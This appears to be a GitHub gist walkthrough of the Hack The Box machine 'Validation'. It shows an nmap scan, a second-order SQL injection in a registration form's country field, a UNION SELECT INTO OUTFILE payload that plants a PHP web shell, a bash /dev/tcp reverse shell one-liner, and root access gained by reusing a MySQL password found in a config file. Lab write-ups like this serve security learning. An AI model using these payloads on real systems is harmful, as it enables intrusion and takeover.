Skip to content

Instantly share code, notes, and snippets.

@0xEmbo
Created September 23, 2021 20:21
Show Gist options
  • Save 0xEmbo/1770533c841006dde5359a09553ff2a0 to your computer and use it in GitHub Desktop.
Save 0xEmbo/1770533c841006dde5359a09553ff2a0 to your computer and use it in GitHub Desktop.

10.10.11.116

Validation

Nmap Scan

namp -sC -sV -oA validation 10.10.11.116

Nmap scan report for 10.10.11.116
Host is up (0.18s latency).
Not shown: 992 closed ports
PORT     STATE    SERVICE       VERSION
22/tcp   open     ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
|   256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_  256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp   open     http          Apache httpd 2.4.48 ((Debian))
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
8080/tcp open     http          nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have 3 ports open: 22 => ssh 80 => http 8080 => http

HTTP Enumeration

Port 8080 gives 502 Bad Gateway so lets enumerate port 80 ![[Pasted image 20210923191459.png]]

Going to http://10.10.11.116 we have a registeration form. ![[Pasted image 20210923191422.png]]

Putting some data and click submit. ![[Pasted image 20210923192723.png]] It seems like it's saving our inputs into the database and then fetching them and displaying them on the page. or it is just displaying them without using a database.

Tried injecting a single quote in the username field but nothing happend, then i intercepted the request and injected a single quote in the country parameter and i got this error. ![[Pasted image 20210923193406.png]]

Making the connection sleep for 10 seconds Andorra' UNION SELECT sleep(10); -- - ![[Pasted image 20210923195623.png]]

And follow redirection, it worked successfully. ![[Pasted image 20210923195446.png]]

I guess we have a second order SQL injection vulnerability, because the sleep occurs when fetching (displaying) the data on the page, and doesn't occur when submitting the data at first.

That means that the user input is sanatized correctly, but the problem is when the web application fetches the data that is already stored in the database it doesn't validate it again.

Initial Foothold

Now that we have a SQLi, lets try to drop a shell on the box. Andorra' UNION SELECT '<?php SYSTEM($_GET["c"]) ?>' INTO OUTFILE '/var/www/html/shell.php' -- - ![[Pasted image 20210923203159.png]]

![[Pasted image 20210923203456.png]]

We get an error but when we try to visit shell.php it's created successfully. ![[Pasted image 20210923203702.png]]

Now lets specify the c parameter to execute id command. ![[Pasted image 20210923203810.png]]

You can use any reverse shell you want, i like using this one bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1' ![[Pasted image 20210923205030.png]]

Getting root

There is config file that contains mysql credentials uhc:uhc-9qual-global-pw ![[Pasted image 20210923211743.png]]

Tried this password with root and we are now root! ![[Pasted image 20210923212023.png]]

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment